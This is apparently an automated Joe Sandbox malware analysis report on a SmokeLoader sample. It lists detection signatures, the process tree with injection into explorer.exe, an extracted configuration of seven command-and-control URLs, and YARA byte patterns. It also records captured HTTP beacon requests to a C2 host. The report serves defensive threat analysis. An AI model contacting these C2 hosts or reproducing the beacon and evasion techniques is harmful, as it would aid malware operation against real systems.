Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vwaoMjcyAw.exe

Overview

General Information

Sample name:vwaoMjcyAw.exe
renamed because original name is a hash value
Original sample name:49b527dacc10e6d0e9d2924ecc4e59a8d727d5a2eb89aea324d303f4c8e7ba28.exe
Analysis ID:1496331
MD5:5c86694b89a930b319f453e541d17869
SHA1:3e476f9253d814620a2fa2b9bd19374d420a3c67
SHA256:49b527dacc10e6d0e9d2924ecc4e59a8d727d5a2eb89aea324d303f4c8e7ba28
Tags:45-66-231-202exeSmokeLoader
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • vwaoMjcyAw.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\vwaoMjcyAw.exe" MD5: 5C86694B89A930B319F453E541D17869)
    • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • ifvwgru (PID: 3248 cmdline: C:\Users\user\AppData\Roaming\ifvwgru MD5: 5C86694B89A930B319F453E541D17869)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x6a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000006.00000002.2485885145.0000000002C40000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x75ab:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    Click to see the 12 entries

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Execution of Suspicious File Type Extension
    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ifvwgru, CommandLine: C:\Users\user\AppData\Roaming\ifvwgru, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ifvwgru, NewProcessName: C:\Users\user\AppData\Roaming\ifvwgru, OriginalFileName: C:\Users\user\AppData\Roaming\ifvwgru, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\ifvwgru, ProcessId: 3248, ProcessName: ifvwgru

    Suricata Signatures

    Timestamp:2024-08-21T07:12:54.073227+0200
    SID:2039103
    Severity:1
    Source Port:49717
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-21T07:12:32.808611+0200
    SID:2039103
    Severity:1
    Source Port:49717
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-21T07:12:54.307863+0200
    SID:2039103
    Severity:1
    Source Port:49717
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-21T07:12:33.042264+0200
    SID:2039103
    Severity:1
    Source Port:49717
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: http://valarioulinity1.net/index.phpAvira URL Cloud: Label: malware
    Source: http://selebration17io.io/Avira URL Cloud: Label: phishing
    Source: http://vacantion18ffeu.cc/index.phpAvira URL Cloud: Label: malware
    Source: http://goodfooggooftool.net/index.phpAvira URL Cloud: Label: malware
    Source: http://cassiosssionunu.me/index.phpAvira URL Cloud: Label: malware
    Source: http://selebration17io.io/index.phpAvira URL Cloud: Label: malware
    Source: http://sulugilioiu19.net/index.phpAvira URL Cloud: Label: malware
    Source: http://buriatiarutuhuob.net/index.phpAvira URL Cloud: Label: malware
    Found malware configuration
    Source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}
    Multi AV Scanner detection for domain / URL
    Source: selebration17io.ioVirustotal: Detection: 16%Perma Link
    Source: http://vacantion18ffeu.cc/index.phpVirustotal: Detection: 21%Perma Link
    Source: http://selebration17io.io/Virustotal: Detection: 16%Perma Link
    Source: http://valarioulinity1.net/index.phpVirustotal: Detection: 14%Perma Link
    Source: http://selebration17io.io/index.phpVirustotal: Detection: 14%Perma Link
    Source: http://goodfooggooftool.net/index.phpVirustotal: Detection: 15%Perma Link
    Source: http://buriatiarutuhuob.net/index.phpVirustotal: Detection: 15%Perma Link
    Source: http://sulugilioiu19.net/index.phpVirustotal: Detection: 13%Perma Link
    Source: http://cassiosssionunu.me/index.phpVirustotal: Detection: 13%Perma Link
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Roaming\ifvwgruReversingLabs: Detection: 73%
    Source: C:\Users\user\AppData\Roaming\ifvwgruVirustotal: Detection: 76%Perma Link
    Multi AV Scanner detection for submitted file
    Source: vwaoMjcyAw.exeReversingLabs: Detection: 73%
    Source: vwaoMjcyAw.exeVirustotal: Detection: 76%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for dropped file
    Source: C:\Users\user\AppData\Roaming\ifvwgruJoe Sandbox ML: detected
    Machine Learning detection for sample
    Source: vwaoMjcyAw.exeJoe Sandbox ML: detected
    Source: vwaoMjcyAw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: Binary string: C:\dugo_caves\betuw sib.pdb source: vwaoMjcyAw.exe, ifvwgru.2.dr

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49717 -> 188.40.141.211:80
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 80Jump to behavior
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: http://goodfooggooftool.net/index.php
    Source: Malware configuration extractorURLs: http://sulugilioiu19.net/index.php
    Source: Malware configuration extractorURLs: http://selebration17io.io/index.php
    Source: Malware configuration extractorURLs: http://vacantion18ffeu.cc/index.php
    Source: Malware configuration extractorURLs: http://valarioulinity1.net/index.php
    Source: Malware configuration extractorURLs: http://buriatiarutuhuob.net/index.php
    Source: Malware configuration extractorURLs: http://cassiosssionunu.me/index.php
    Source: Joe Sandbox ViewIP Address: 188.40.141.211 188.40.141.211
    Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://atahmsiplorwquuw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: selebration17io.io
    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://brprnhfudhwwlf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: selebration17io.io
    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mwqxqnqsqljxlnw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: selebration17io.io
    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aeuothcasbr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: selebration17io.io
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: selebration17io.io
    Source: global trafficDNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa
    Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://atahmsiplorwquuw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: selebration17io.io
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Wed, 21 Aug 2024 05:12:32 GMTData Raw: 03 00 00 00 1f 3d 19 Data Ascii: =
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Wed, 21 Aug 2024 05:12:32 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Wed, 21 Aug 2024 05:12:53 GMTData Raw: 03 00 00 00 1f 3d 19 Data Ascii: =
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Wed, 21 Aug 2024 05:12:54 GMT
    Source: explorer.exe, 00000002.00000002.3452125149.000000000C385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979437025.000000000C385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://aeuothcasbr.com/
    Source: explorer.exe, 00000002.00000002.3452125149.000000000C385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979437025.000000000C385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://aeuothcasbr.com/application/x-www-form-urlencodedMozilla/5.0
    Source: explorer.exe, 00000002.00000002.3448807647.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://atahmsiplorwquuw.net/
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000978C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
    Source: explorer.exe, 00000002.00000000.2251732709.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3446354300.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3446333236.0000000007B50000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
    Source: explorer.exe, 00000002.00000002.3452125149.000000000C385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979437025.000000000C385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://selebration17io.io/
    Source: explorer.exe, 00000002.00000002.3452963465.0000000010760000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3452941150.0000000010620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://selebration17io.io/index.php
    Source: explorer.exe, 00000002.00000000.2255032281.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
    Source: explorer.exe, 00000002.00000002.3451360110.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2256911237.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
    Source: explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
    Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
    Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
    Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
    Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
    Source: explorer.exe, 00000002.00000003.2979925369.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3451553162.000000000C08B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2256911237.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
    Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
    Source: explorer.exe, 00000002.00000003.2979925369.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3451553162.000000000C08B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2256911237.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
    Source: explorer.exe, 00000002.00000000.2256911237.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3451360110.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000002.00000002.3448807647.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2255032281.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
    Source: explorer.exe, 00000002.00000003.2979925369.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3451553162.000000000C08B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2256911237.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
    Source: explorer.exe, 00000002.00000000.2252804961.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Yara detected SmokeLoader
    Source: Yara matchFile source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000006.00000002.2485885145.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000006.00000002.2486160796.0000000002EC3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
